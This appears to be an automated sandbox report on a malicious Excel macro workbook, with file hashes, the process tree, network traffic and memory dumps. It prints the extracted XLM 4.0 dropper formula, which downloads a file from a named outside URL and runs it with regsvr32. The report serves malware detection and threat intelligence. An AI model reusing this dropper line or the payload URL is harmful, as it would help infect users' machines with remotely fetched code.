Overview

overview

10

Static

static

10

f79f25604a...5.xlsm

windows7-x64

10

f79f25604a...5.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 23:23 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25.xlsm

  • Size

    38KB

  • MD5

    68bb87d405663f89976f2646ce87a7d5

  • SHA1

    01b51b47b141f27baa890dd6781d86cb4ddb19c7

  • SHA256

    f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25

  • SHA512

    91411e57372cbdf67fc175da34a4202a44788c43c2f2ef6278a854eff4a4b63badf3dfa20b7e1edd848295d8228152bf6410b95c0d4fecfe695351592f64bb8d

  • SSDEEP

    768:3+d/GCR8UjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooFVIyu:3WT9OZZ1ZYpoQ/pMAeVIy08a

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/", "..\wnru.ocx")
URLs
xlm40.dropper

https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\f79f25604a78cd815328c8e39e3289572dd59c9edb601a34b0a581e412c45b25.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1412
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\wnru.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:404

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    neu-azsc-000.roaming.officeapps.live.com
    neu-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com
    IN A
    52.109.76.243
  • flag-ie
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.76.243:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_356
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: neu-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-2xfW7fO8Y6QNpkYBJZRR1fgfMTulssIe2suN1RiJDdIvcR14C4yrjChRt/OXqhxvax/nZTf7bquN8LPHhUzLX+j9GKgCVQu3AkW6aqUn7O4Vk/vd/T5cAWB+MLb6WofzX114R+Vs7CmiNcPm7F3bTdVYKVwO/wWemNdAwb6hOtU=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: a2835f57-0094-4f5f-abb8-ca0faa104956
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 23:23:59 GMT
    Content-Length: 654
  • flag-us
    DNS
    al-brik.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    al-brik.com
    IN A
    Response
    al-brik.com
    IN A
    13.248.213.45
    al-brik.com
    IN A
    76.223.67.189
  • flag-us
    GET
    https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
    EXCEL.EXE
    Remote address:
    13.248.213.45:443
    Request
    GET /vb/pjD6kXT79JBgdqhtgBU/ HTTP/2.0
    host: al-brik.com
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    content-type: text/html
    content-length: 114
    date: Wed, 20 Nov 2024 23:24:00 GMT
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    243.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    243.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    134.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    134.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    45.213.248.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    45.213.248.13.in-addr.arpa
    IN PTR
    Response
    45.213.248.13.in-addr.arpa
    IN PTR
    a67c48129651a0940awsglobalacceleratorcom
  • flag-us
    DNS
    36.249.124.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    36.249.124.192.in-addr.arpa
    IN PTR
    Response
    36.249.124.192.in-addr.arpa
    IN PTR
    cloudproxy10036sucurinet
  • flag-us
    DNS
    228.249.119.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    228.249.119.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    11.173.189.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.173.189.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    15.164.165.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    15.164.165.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    217.135.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    217.135.221.88.in-addr.arpa
    IN PTR
    Response
    217.135.221.88.in-addr.arpa
    IN PTR
    a88-221-135-217deploystaticakamaitechnologiescom
  • flag-us
    DNS
    29.243.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    29.243.111.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.76.243:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
     8.2kB
     12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 13.248.213.45:443
    https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/
    tls, http2
    EXCEL.EXE
    1.3kB
     4.3kB
     15
    10

    HTTP Request

    GET https://al-brik.com/vb/pjD6kXT79JBgdqhtgBU/

    HTTP Response

    200
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     248 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.76.243

  • 8.8.8.8:53
    al-brik.com
    dns
    EXCEL.EXE
    57 B
     89 B
     1
    1

    DNS Request

    al-brik.com

    DNS Response

    13.248.213.45
    76.223.67.189

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    243.76.109.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    243.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    134.32.126.40.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    134.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    45.213.248.13.in-addr.arpa
    dns
    72 B
     128 B
     1
    1

    DNS Request

    45.213.248.13.in-addr.arpa

  • 8.8.8.8:53
    36.249.124.192.in-addr.arpa
    dns
    73 B
     113 B
     1
    1

    DNS Request

    36.249.124.192.in-addr.arpa

  • 8.8.8.8:53
    228.249.119.40.in-addr.arpa
    dns
    73 B
     159 B
     1
    1

    DNS Request

    228.249.119.40.in-addr.arpa

  • 8.8.8.8:53
    11.173.189.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
     160 B
     1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    15.164.165.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    15.164.165.52.in-addr.arpa

  • 8.8.8.8:53
    217.135.221.88.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    217.135.221.88.in-addr.arpa

  • 8.8.8.8:53
    29.243.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    29.243.111.52.in-addr.arpa

  • 8.8.8.8:53
    48.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    48.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize

    1KB

    MD5

    596076cc86589b48c3e43b4c5afdb839

    SHA1

    0daabd711eb6ff09fc5e8aaa9662ce26906496c9

    SHA256

    636b3792ee355c05297d33161ad9b9af39ddf18ca442953c94b73f2036c3cc65

    SHA512

    77f2f32b5cedc1f3486cf239e8d79671d9f3b21fc1f6bd02a3835da4c4e909896da674b7817082088cc9427a101bf6c6bfe0f9c62cf0cb370bb179499f93d192

    Download Submit

  • C:\Users\Admin\wnru.ocx
    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    Download Submit

  • memory/1412-14-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-12-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-5-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-4-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-7-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-8-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-11-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-15-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-2-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-13-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-16-0x00007FFD11E30000-0x00007FFD11E40000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-1-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1412-17-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-10-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-9-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-6-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-0-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1412-38-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-39-0x00007FFD547AD000-0x00007FFD547AE000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1412-40-0x00007FFD54710000-0x00007FFD54905000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1412-3-0x00007FFD14790000-0x00007FFD147A0000-memory.dmp

    Filesize

    64KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.